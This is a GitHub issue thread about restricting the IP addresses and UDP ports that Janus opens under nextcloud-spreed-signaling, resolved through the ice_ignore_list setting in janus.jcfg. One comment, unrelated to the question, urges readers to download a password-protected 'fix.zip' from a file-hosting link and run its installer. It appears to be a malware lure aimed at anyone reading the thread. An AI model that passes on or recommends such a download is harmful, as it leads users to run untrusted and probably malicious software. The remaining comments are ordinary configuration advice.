### ISSUE TITLE
Janus populates all IPs of host

### ISSUE THREAD

**Issue by normen** [strukturag/nextcloud-spreed-signaling#807]
Hi,

it seems that when janus starts up for a conversation it starts UDP listeners on ALL IPs that it can find, is there a way to restrict these? As the ports are seemingly opened through the spreed-signaling server I thought this might be the right place to ask?

And as a side question, what are the "official" UDP ports that are being used? It seems that it mostly is in the `30000-65535` range? Also janus seems to listen on `5002, 5004, 5102, 5104, 5106 / udp`, do these have to be open to the public? It seems to work for me if they're not.

Thanks for the attention and the server!

**Comment by luozhengdong** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by fancycode** [comment]
Please see the Janus project for any questions on how to configure it:
https://github.com/meetecho/janus-gateway

They also have a discourse group to ask questions that are not about issues with the code of Janus itself:
https://janus.discourse.group/

**Comment by normen** [comment]
> Please see the Janus project for any questions on how to configure it: https://github.com/meetecho/janus-gateway
> 
> They also have a discourse group to ask questions that are not about issues with the code of Janus itself: https://janus.discourse.group/

Thanks but as said, aren't the settings configured through the VideoRoom plugin by the signaling server? I did manage to enable ipv6 through the command line options of janus, for ip ranges there seem to be no options?

**Comment by fancycode** [comment]
Janus has various configuration files, see https://github.com/meetecho/janus-gateway/blob/2892902a7708cec8b6150a411138dc52e69055df/conf/janus.jcfg.sample.in#L230 for the RTP port range.

**Comment by normen** [comment]
Ah alright, thanks I was under the impression that there were only sample files, no actual configs.

What I had to do (in the dockerized janus from this project) was change the file at `/usr/local/etc/janus/janus.jcfg' in the section `nat` I had to extend the `ice_ignore_list` to include the unwanted IP adresses.
